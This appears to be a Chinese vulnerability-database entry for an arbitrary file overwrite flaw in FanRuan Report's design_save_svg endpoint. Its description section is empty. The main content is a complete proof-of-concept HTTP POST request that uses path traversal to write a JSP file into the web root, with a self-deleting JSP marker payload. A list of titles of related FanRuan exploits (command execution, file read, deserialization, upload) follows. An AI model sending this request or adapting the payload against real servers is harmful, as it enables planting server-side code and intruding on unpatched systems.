帆软报表 design_save_svg 存在任意文件覆盖漏洞

漏洞描述

PoC代码

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/heawvb.svg.jsp HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 171
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko

{"__CONTENT__":"<%out.println(\"227d4799c34cd32cd4d1316f249deb50\");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>","__CHARSET__":"UTF-8"}

相关漏洞推荐

• 帆软报表 /WebReport/ReportServe?op=plugin_logdb 代码执行漏洞
• POC CNVD-2018-04757: 帆软报表 V8 get_geo_json 任意文件读取漏洞
• POC fanruan-oa-v9-designsavevg-upload-file: 帆软报表 V9 design_save_svg 任意文件覆盖文件上传
• 致远OA-帆软报表组件 dbcommit 命令执行漏洞
• 帆软报表 dbcommit 命令执行漏洞
• 帆软报表远程命令执行漏洞
• 帆软报表 fs_remote_design 目录遍历漏洞
• 帆软报表v9任意文件写入（绕过JSP不解析的情况，上传dll RCE）
• 帆软报表v10 /decision/remote/design/channel 存在反序列化漏洞(二次反序列化绕过)
• 帆软报表FineVis插件任意文件上传漏洞
• 帆软报表 local_install 任意文件上传漏洞
• 帆软报表 ReportServer 存在模板注入漏洞
• 帆软报表 ReportServer 存在任意文件读取漏洞